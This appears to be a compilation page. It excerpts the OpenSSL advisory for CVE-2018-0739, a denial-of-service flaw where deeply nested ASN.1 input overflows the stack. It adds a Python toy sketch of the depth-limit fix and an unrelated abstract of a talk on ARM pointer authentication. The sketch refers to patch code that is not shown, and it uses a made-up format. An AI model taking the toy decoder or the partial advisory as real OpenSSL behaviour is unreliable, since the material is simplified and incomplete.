Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe.
OpenSSL 1.1.0 users should upgrade to 1.1.0h
OpenSSL 1.0.2 users should upgrade to 1.0.2o

This issue was reported to OpenSSL on 4th January 2018 by the OSS-fuzz project. The fix was developed by Matt Caswell of the OpenSSL development team.

Source: https://xorl.wordpress.com/2018/03/30/cve-2018-0739-openssl-asn-1-stack-overflow/
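
The depth-counter pattern used by the fix described above can be shown in isolation. The Python sketch below is a toy, not OpenSSL code and not real ASN.1: it assumes a made-up format with a one-byte tag and a one-byte length, where tag 0x30 marks a constructed value whose content is parsed recursively. The names `decode`, `nest`, `MAX_NEST` and `NestedTooDeep` are invented for this example; only the limit of 30 and the increment-then-compare check mirror the patch.

```python
MAX_NEST = 30  # same value as ASN1_MAX_CONSTRUCTED_NEST in the patch


class NestedTooDeep(ValueError):
    """Raised when the input nests constructed values beyond MAX_NEST."""


def decode(buf, depth=0):
    """Decode a toy TLV stream: 1-byte tag, 1-byte length, then the value.

    Tag 0x30 marks a constructed value whose content is itself a TLV stream.
    """
    depth += 1
    if depth > MAX_NEST:  # same shape as `++depth > ASN1_MAX_CONSTRUCTED_NEST`
        raise NestedTooDeep("nested too deep")
    items = []
    i = 0
    while i < len(buf):
        if i + 2 > len(buf):
            raise ValueError("truncated header")
        tag, length = buf[i], buf[i + 1]
        value = buf[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated value")
        if tag == 0x30:
            items.append(decode(value, depth))  # recurse with the counter
        else:
            items.append((tag, value))
        i += 2 + length
    return items


def nest(levels):
    """Wrap one toy primitive in `levels` constructed values."""
    data = b"\x04\x01A"  # tag 0x04, length 1, value b"A"
    for _ in range(levels):
        data = bytes([0x30, len(data)]) + data
    return data


print(decode(nest(2)))

try:
    decode(nest(30))
except NestedTooDeep as exc:
    print("rejected:", exc)
```

Passing the counter as an argument, as the patch does, keeps the limit per call chain: sibling values at the same level do not consume each other's depth budget, and the check fails cleanly with an error instead of exhausting the stack.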
  25. Microsoft Security Response Center (MSRC)

Published on 14 Feb 2018

Rob Turner, Qualcomm Technologies

Almost three decades since the Morris worm and we're still plagued by memory corruption vulnerabilities in C and C++ software. Exploit mitigations aim to make the exploitation of these vulnerabilities impossible or prohibitively expensive. However, modern exploits demonstrate that currently deployed countermeasures are insufficient. In ARMv8.3, ARM introduces a new hardware security feature, pointer authentication. With ARM and ARM partners, including Microsoft, we helped to design this feature. Designing a processor extension is challenging. Among other requirements, changes should be transparent to developers (except compiler developers), support both system and application code, interoperate with legacy software, and provide binary backward compatibility. This talk discusses the processor extension and explores the design trade-offs, such as the decision to prefer authentication over encryption and the consequences of small tags. Also, this talk provides a security analysis, and examines how these new instructions can robustly and efficiently implement countermeasures.

Presentation Slide Deck: https://www.slideshare.net/MSbluehat/...